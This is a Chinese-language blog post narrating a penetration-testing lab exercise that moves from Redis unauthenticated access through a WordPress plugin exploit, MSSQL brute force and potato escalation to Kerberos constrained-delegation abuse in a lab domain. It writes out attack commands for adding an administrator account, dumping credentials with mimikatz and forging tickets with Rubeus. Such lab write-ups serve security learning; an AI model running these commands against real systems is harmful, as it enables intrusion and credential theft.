<!DOCTYPE html>
<html lang="zh">
  <head prefix="og: https://ogp.me/ns#">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="color-scheme" content="light dark">
  
  <title>Brute4Road - DashingBug</title>
  
    <link rel="shortcut icon" href="/./bug.png">
  
  
  <link rel='manifest' href='/manifest.json'>
  

  
  
  
  <meta property="og:title" content="Brute4Road - DashingBug" />
  
  <meta property="og:type" content="article" />
  
  <meta property="og:url" content="http://dashingbug.xin/2026/03/11/Brute4Road/index.html" />
  
  <meta property="og:image" content="/favicon.png" />
  
  <meta property="og:article:published_time" content="2026-03-10T16:00:00.000Z" />
  
  <meta property="og:article:author" content="DashingBug" />
  
  

  
  
<link rel="stylesheet" href="https://unpkg.com/simple-icons-font@v13/font/simple-icons.min.css">

  
  
  
<link rel="stylesheet" href="https://unpkg.com/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">

  

  
<link rel="stylesheet" href="/css/var.css">

  
<link rel="stylesheet" href="/css/main.css">

  
<link rel="stylesheet" href="/css/typography.css">

  
<link rel="stylesheet" href="/css/code-highlighting.css">

  
  
  
<link rel="stylesheet" href="/css/components/card.css">

  
  
  
  
<link rel="stylesheet" href="/css/components/button.css">

  
  
  
  
<link rel="stylesheet" href="/css/components/badge.css">

  
  
  
  
<link rel="stylesheet" href="/css/components/utilities.css">

  
  
  
<link rel="stylesheet" href="/css/nav.css">

  
<link rel="stylesheet" href="/css/paginator.css">

  
<link rel="stylesheet" href="/css/footer.css">

  
<link rel="stylesheet" href="/css/post-list.css">

  
  
<link rel="stylesheet" href="/css/rainbow-banner.css">

  
  
  
<link rel="stylesheet" href="/css/toc.css">

  
  
  
  
  
<link rel="stylesheet" href="/css/post.css">

  
  
  
  
  
  
  
<link rel="stylesheet" href="/css/scroll-reveal.css">

  
  
  
<link rel="stylesheet" href="/css/view-transition.css">

  
  
  <script src="https://unpkg.com/lenis@1.1.9/dist/lenis.min.js"></script>
  
<link rel="stylesheet" href="https://unpkg.com/lenis@1.1.9/dist/lenis.css">

  
<script src="/js/smooth-scroll.js"></script>

  

  

  <script>var ThemeCupertino = {}</script>
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body
    data-color-scheme="auto"
    data-uppercase-categories="true"
    
    data-rainbow-banner="true"
    data-rainbow-banner-shown="always"
    data-rainbow-banner-month="6"
    data-rainbow-banner-colors="#e50000,#ff8d00,#ffee00,#008121,#004cff,#760188"
    
    data-config-root="/"
    
    data-toc="true"
    data-toc-max-depth="2"
    
    
    
    data-scroll-reveal-disappear="false"
    data-scroll-reveal-query=".scroll-reveal, .post-list-item, .card, .content p img, .content .block-large img"
    
  >
    <a href="#main-content" id="skip-to-content">Skip to content</a>
    <nav id="theme-nav">
  <div class="inner">
    <a class="title" href="/">Space</a>
    <div class="nav-arrow"></div>
    <div class="nav-items">
      <a class="nav-item nav-item-home" href="/" style="--index: 0">Home</a>

      
      <a class="nav-item" href="/archives" style="--index: 1">Archives</a>
      
      <a class="nav-item" href="http://dashingbug.xin/link/link.html" style="--index: 2">link</a>
      
      <a class="nav-item" href="/projects" style="--index: 3">Projects</a>
      
      <a class="nav-item" href="/about" style="--index: 4">About</a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://github.com/MrWillCom" style="--index: 5"><i class="si si-github"></i></a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://codepen.io/mrwillcom" style="--index: 6"><i class="si si-codepen"></i></a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://www.patreon.com/MrWillCom" style="--index: 7"><i class="si si-patreon"></i></a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://noc.social/@MrWillCom" style="--index: 8"><i class="si si-mastodon"></i></a>
      
      <a class="nav-item is-icon" href="/search" style="--index: 9"><i class="bi bi-search"></i></a>
      
    </div>
  </div>
</nav>

    <main id="main-content">
      
<article class="post">
  <div class="meta">
    

    
    <time class="date" datetime="2026-03-11T00:00:00+08:00">
      March 11, 2026
    </time>
    

    <h1 class="title">Brute4Road</h1>
  </div>

  <div class="content">
    <p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260311135907738.png" alt="image-20260311135907704"></p>
<p>扫出redis未授权登录</p>
<p>用redis-cli.exe连接</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260311141636984.png" alt="image-20260311141636956"></p>
<p>搜了一下redis未授权登录利用方法，一种需要知道web目录，但我试了一下不在常见的目录下，两种需要root运行redis，但我连切换root目录都做不到显然不是root，最后一种是主从复制，主要影响Redis 4.x至5.0.5版本<img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260311141916078.png" alt="image-20260311141916055"></p>
<p>但是这里是5.0.12明明版本不符合但不知道为什么也能利用主从复制</p>
<p>用redis-rce-master工具成功获得shell</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260311183640509.png" alt="image-20260311183640466"></p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260311183734691.png" alt="image-20260311183734650"></p>
<p>成功反弹shell，打开root显示权限不够，看来要提权了，试试flarum靶场的用capabilities提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getcap -r / 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p>没输出任何东西</p>
<p>试试suid提权<a target="_blank" rel="noopener" href="https://gtfobins.org/">GTFOBins</a>（这个网站可以查看可用的命令）</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312101713259.png" alt="image-20260312101706197"></p>
<p>有base64,用base64提权</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312101809775.png" alt="image-20260312101809742"></p>
<p>成功拿到flag01</p>
<p>扫一下内网下</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312103528756.png" alt="image-20260312103528701"></p>
<p>梳理一下要打的目标</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">172.22.2.3 DC</span><br><span class="line">172.22.2.16 MSSQLSERVER</span><br><span class="line">172.22.2.18 WORKGROUP\UBUNTU-WEB2</span><br><span class="line">172.22.2.37 XIAORANG\CLIENT01</span><br></pre></td></tr></table></figure>

<p>用wpscan扫一下UBUNTU-WEB2</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312144009696.png" alt="image-20260312144009336"></p>
<p>发现wpcargo插件<a target="_blank" rel="noopener" href="https://github.com/biulove0x/CVE-2021-25003">GitHub - biulove0x&#x2F;CVE-2021-25003: WPCargo &lt; 6.9.0 - Unauthenticated RCE · GitHub</a></p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312152546632.png" alt="image-20260312152546496"></p>
<p>又nm被网络问题卡了一小时，以后渗透再也不用实验室的网了</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312153017119.png" alt="image-20260312153017081"></p>
<p>注意这里连接类型为CMDLINUX</p>
<p>可以可以被阴了一手，不知道为什么这里显示出来的是config.php,</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312153939946.png" alt="image-20260312153939890"></p>
<p>但这些php前面全部都是有wp-打头的，我还以为没权限找了半天咋提权</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312154026148.png" alt="image-20260312154026110"></p>
<p>wp-config.php有数据库用户名和密码</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312155435740.png" alt="image-20260312155435706"></p>
<p>但是奇怪的是不知道为什么navicat连不上，但蚁剑能连上</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312172219872.png" alt="image-20260312172219822"></p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312172241704.png" alt="image-20260312172241637"></p>
<p>导出，爆破一下MYSQLSERVER</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312172306787.png" alt="image-20260312172306751"></p>
<p>爆破最好每两百个密码一个文件，分批次爆破，因为全部塞一个文件fscan爆破一半就不会爆破了。</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312172956159.png" alt="image-20260312172956128"></p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312180002590.png" alt="image-20260312180002550"></p>
<p>土豆提权只需启用了SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege，这里有SeImpersonatePrivilege可以用土豆提权</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312180147209.png" alt="image-20260312180147166"></p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260312181419782.png" alt="image-20260312181419735"></p>
<p>注意命令格式要正确</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\Public\GodPotato-NET4.exe -cmd &quot;net user bug bug@ /add&quot;#这个@是密码的一部分</span><br><span class="line">C:\Users\Public\GodPotato-NET4.exe -cmd &quot;net localgroup administrators bug /add&quot;</span><br></pre></td></tr></table></figure>

<p>rdp一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\public\GodPotato-NET4.exe -cmd &quot;cmd /c C:/Users/Public/mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit&quot;</span><br></pre></td></tr></table></figure>

<p>mimikatz抓取一下哈希</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260313222711731.png" alt="image-20260313222711689"></p>
<p>哈希653110e5754731cbf7539297bf3f4ac3</p>
<p>通过BloodHound分析可知MSSQLSERVER对DC有约束委派（但我BloodHound老生成不了正确的zip）</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/11001#toc-18">域渗透之委派攻击全集-先知社区</a></p>
<h2 id="约束委派"><a href="#约束委派" class="headerlink" title="约束委派"></a>约束委派</h2><p>如果B设置了msDS-AllowedToDelegateTo的值为服务C，那么B就能伪造任意用户访问服务C，这就是S4U攻击</p>
<p>如果已经拿下了B的控制权，只需三步即可拿下服务C</p>
<p>1.获取当前机器账号或者服务账号的哈希</p>
<p>2.利用获取到的哈希向DC申请TGT</p>
<p>3.利用TGT向DC申请ST下面就是实操</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:653110e5754731cbf7539297bf3f4ac3 /domain:xiaorang.lab /dc:DC.xiaorang.lab /ptt /nowrap</span><br></pre></td></tr></table></figure>



<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260313223104013.png" alt="image-20260313223103964"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\Rubeus.exe s4u /user:MSSQLSERVER$ /rc4:653110e5754731cbf7539297bf3f4ac3 /domain:xiaorang.lab /dc:DC.xiaorang.lab /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /ptt /nowrap</span><br></pre></td></tr></table></figure>

<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260313224211264.png" alt="image-20260313224211215"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\mimikatz.exe &quot;kerberos::list&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260313224243468.png" alt="image-20260313224243426"></p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260313224304937.png" alt="image-20260313224304887"></p>

  </div>

  
  <div class="about">
    <h1>About this Post</h1>
    <div class="details">
      <p>This post is written by DashingBug, licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc/4.0">CC BY-NC 4.0</a>.</p>
    </div>
    
  </div>
  

  <div class="container post-prev-next">
    
    <a href="/2026/03/16/Delegation/" class="next">
      <div class="text">
        <p class="label">Next</p>
        <h3 class="title">Delegation</h3>
      </div>
    </a>
    
    
    <a href="/2026/03/07/Flarum/" class="prev">
      <div class="text">
        <p class="label">Previous</p>
        <h3 class="title">Flarum</h3>
      </div>
    </a>
    
  </div>

  
    
    
  
</article>


    </main>
    <footer>
  <div class="inner">
    <div class="links">
      
      <div class="group">
        <h2 class="title">Blog</h2>
        
        <a href="/" class="item">Home</a>
        
        <a href="/archives" class="item">Archives</a>
        
        <a href="/tags" class="item">Tags</a>
        
        <a href="/categories" class="item">Categories</a>
        
        <a href="/search" class="item">Search</a>
        
        <a href="/links" class="item">link</a>
        
        <a href="/projects" class="item">Projects</a>
        
        <a href="/resume" class="item">Resume</a>
        
        <a href="/about" class="item">About</a>
        
        <a href="/atom.xml" class="item">RSS</a>
        
      </div>
      
      <div class="group">
        <h2 class="title">Projects</h2>
        
        <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/hexo-theme-cupertino" class="item">Hexo Theme Cupertino</a>
        
        <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/next-mastodon-gallery" class="item">Next Mastodon Gallery</a>
        
      </div>
      
      <div class="group">
        <h2 class="title">Me</h2>
        
        <a target="_blank" rel="noopener" href="https://github.com/MrWillCom" class="item">GitHub</a>
        
        <a target="_blank" rel="noopener" href="https://codepen.io/mrwillcom" class="item">CodePen</a>
        
        <a target="_blank" rel="noopener" href="https://www.patreon.com/MrWillCom" class="item">Patreon</a>
        
        <a target="_blank" rel="noopener" href="https://noc.social/@MrWillCom" class="item">Mastodon</a>
        
        <a href="mailto:mr.will.com@outlook.com" class="item">Email</a>
        
      </div>
      
    </div>
    <span>&copy; 2026 DashingBug<br>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></span>
    
    
      <br>
      <div class="color-scheme-toggle" role="radiogroup" id="theme-color-scheme-toggle">
        <label>
          <input type="radio" value="light">
          <span>Light</span>
        </label>
        <label>
          <input type="radio" value="dark">
          <span>Dark</span>
        </label>
        <label>
          <input type="radio" value="auto">
          <span>Auto</span>
        </label>
      </div>
    
  </div>
</footer>


    
<script src="/js/main.js"></script>


    

    
    
<script src="/js/scroll-reveal.js"></script>

    

    

    

    
  </body>
</html>
